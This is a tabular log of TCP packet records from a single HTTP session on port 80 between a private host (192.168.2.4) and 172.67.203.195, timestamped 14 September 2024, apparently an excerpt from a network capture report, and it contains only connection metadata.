                                        Sep 14, 2024 18:31:11.258337021 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.258347034 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.258356094 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.258372068 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.258407116 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.258459091 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.258470058 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.258480072 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.258490086 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.258500099 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.258511066 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.258517981 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.258522987 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.258533001 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.258539915 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.258574009 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.258574009 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.258860111 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.258869886 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.258879900 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.258898020 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.258908987 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.258914948 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.258919954 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.258949041 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.258953094 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.258960962 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.258980036 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.259013891 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.259114027 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259124994 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259134054 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259167910 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.259203911 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259215117 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259224892 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259263992 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.259299994 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.259372950 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259390116 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259399891 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259438992 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.259460926 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259471893 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259481907 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259491920 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259504080 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259515047 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.259553909 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.259553909 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.259593964 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259604931 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259620905 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259634972 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259646893 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.259646893 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259660959 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259671926 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259680986 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259691954 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.259706020 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.259744883 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.268529892 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.268551111 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.268562078 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.268598080 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.268640041 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.268651009 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.268662930 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.268673897 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.268685102 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.268721104 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.268754959 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.301002979 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.301019907 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.301031113 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.301040888 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.301052094 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.301062107 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.301079035 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.301265955 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.301265955 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.341686010 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.341696978 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.341706991 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.341870070 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.341984034 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.341999054 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.342009068 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.342017889 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.342027903 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.342160940 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.342160940 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.342405081 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.342416048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.342426062 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.342560053 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.342569113 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.342569113 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.342570066 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.342628956 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.342709064 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.342719078 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.342727900 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.342772007 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.342863083 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.342873096 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.342880964 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.342921019 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.342957973 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.343015909 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.343024969 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.343034983 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.343043089 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.343051910 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.343066931 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.343101025 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.344202042 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344218016 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344229937 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344259977 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.344295979 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.344350100 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344362020 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344372034 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344383001 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344393969 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344403982 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344408989 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.344415903 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344427109 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344429970 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.344436884 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344449043 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344454050 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.344460964 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344471931 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344486952 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.344511032 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.344542027 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.344631910 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344644070 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344654083 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344687939 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.344721079 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344732046 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344743013 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344758034 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344773054 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.344804049 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.344866991 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344877958 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344888926 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344898939 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344907999 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344923019 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.344923973 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.344955921 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.344996929 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345007896 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345017910 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345027924 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345036983 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345046997 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345050097 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.345094919 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.345133066 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345144033 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345154047 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345163107 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345189095 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.345223904 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.345243931 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345256090 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345264912 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345273972 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345283985 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345298052 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.345299006 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345314026 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345321894 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345335007 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.345374107 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345381975 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.345386028 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345403910 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345413923 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345426083 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345427990 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.345438004 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345448971 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345468998 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.345504045 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.345504999 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.345889091 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345901012 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345911026 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.345943928 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.346019983 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346030951 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346041918 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346050978 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346060991 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346076012 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.346110106 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.346143961 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346165895 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346174955 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346184015 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346209049 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346219063 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346220970 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.346230030 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346259117 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346260071 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.346270084 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346282005 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.346313000 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.346349001 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346360922 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346402884 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.346416950 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346427917 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346440077 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346451998 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.346467018 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.346499920 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.347367048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.347390890 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.347402096 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.347419977 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.347454071 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.347492933 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.347506046 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.347515106 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.347524881 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.347548008 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.347579002 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.355485916 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.355515957 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.355525970 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.355566978 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.355576992 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.355587959 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.355597019 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.355606079 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.355690956 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.355690956 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.355690956 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.355690956 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.384552956 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.384562969 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.384610891 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.384623051 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.384634018 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.384644985 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.384716988 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.384728909 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.384737015 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.384737015 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.384737015 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.384831905 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.396035910 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.427452087 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.427464008 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.427470922 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.427476883 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.427481890 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.427488089 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.427493095 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.427500010 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.427939892 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.427937984 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.427958965 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.427978039 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.428040981 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.428042889 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.428055048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.428066015 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.428076029 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.428092003 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.428097010 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.428108931 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.428133011 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.428137064 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.428148031 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.428162098 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.428179026 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.428317070 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.428328037 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.428339005 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.428348064 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.428363085 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.428375006 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.428406954 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.430103064 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.430113077 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.430126905 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.430144072 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.430154085 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.430164099 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.430166006 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.430201054 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.430210114 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.430219889 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.430273056 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.430309057 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.430320024 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.430362940 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.430938005 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.431029081 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.431042910 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.431052923 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.431083918 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.431122065 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.431133032 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.431143999 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.431154966 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.431159973 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.431205988 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.431731939 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.431742907 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.431755066 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.431786060 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.431812048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.431823969 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.431833982 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.431844950 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.431863070 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.431895018 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.431960106 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.431972027 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.431982040 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.431993008 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432003975 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432013988 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.432044983 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.432065010 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432074070 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432116032 CEST4973880192.168.2.4172.67.203.195
